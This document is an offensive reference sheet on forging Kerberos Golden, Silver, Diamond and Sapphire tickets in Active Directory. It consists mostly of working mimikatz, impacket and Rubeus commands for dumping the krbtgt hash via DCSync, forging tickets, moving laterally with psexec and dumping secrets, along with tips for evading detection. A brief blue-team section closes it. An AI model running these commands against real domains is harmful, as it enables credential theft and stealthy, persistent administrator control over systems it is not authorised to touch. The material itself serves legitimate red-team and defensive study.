GOLDEN-SILVER-TICKETS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Post-compromise Kerberos persistence. A Golden Ticket forges a TGT using the krbtgt hash; a Silver Ticket forges a service ticket (TGS) using a service account hash. Authorized red-team engagements only.
PREREQUISITES#
Golden: krbtgt NTLM/AES key + domain SID + domain FQDN (DA-level compromise). Silver: target service account's NTLM/AES key (e.g. machine$ or svc) + SID + SPN. Get krbtgt hash via DCSync: mimikatz: lsadump::dcsync /user:krbtgt impacket: secretsdump.py -just-dc-user krbtgt DOMAIN/user@dc Domain SID: whoami /user | Get-ADDomain | lookupsid.py
GOLDEN TICKET (mimikatz)#
kerberos::golden /user:Administrator /domain:corp.local ^ /sid:S-1-5-21-... /krbtgt:<NTLMhash> /ptt Prefer AES to blend in: /aes256:<key> instead of /krbtgt. Blend tips: realistic /user, don't use the default 10-year lifetime (/startoffset /endin /renewmax), set proper /groups (512 etc).
GOLDEN TICKET (impacket)#
ticketer.py -nthash <krbtgt> -domain-sid S-1-5-21-... -domain corp.local Administrator export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass corp.local/Administrator@dc.corp.local secretsdump.py -k -no-pass corp.local/Administrator@dc.corp.local
SILVER TICKET#
Forge a TGS for one service on one host (stealthier -- never touches the DC): mimikatz: kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... ^ /target:host.corp.local /service:cifs /rc4:<machine$ NTLM> /ptt impacket: ticketer.py -nthash <svc/machine hash> -domain-sid ... -domain corp.local ^ -spn cifs/host.corp.local Administrator Useful SPNs: cifs (file), host, http, mssqlsvc, ldap, rpcss, wsman.
DIAMOND / SAPPHIRE (modern evasion)#
Diamond: request a real TGT then modify its PAC with krbtgt key (fewer anomalies than a fully forged golden). Rubeus: diamond /krbkey:<aes> /ticketuser:... /ticketuserid:... Sapphire: use a real high-priv PAC via S4U. Both evade "ticket not preceded by AS-REQ".
DETECTION / HARDENING (blue-team note)#
- Rotate krbtgt TWICE (12-24h apart) after any DA compromise. - Watch 4769 for RC4 where AES expected, TGTs with no prior AS-REQ (4768), anomalous ticket lifetimes, and PAC validation failures. - Tier-0 isolation; limit who can DCSync (replication rights).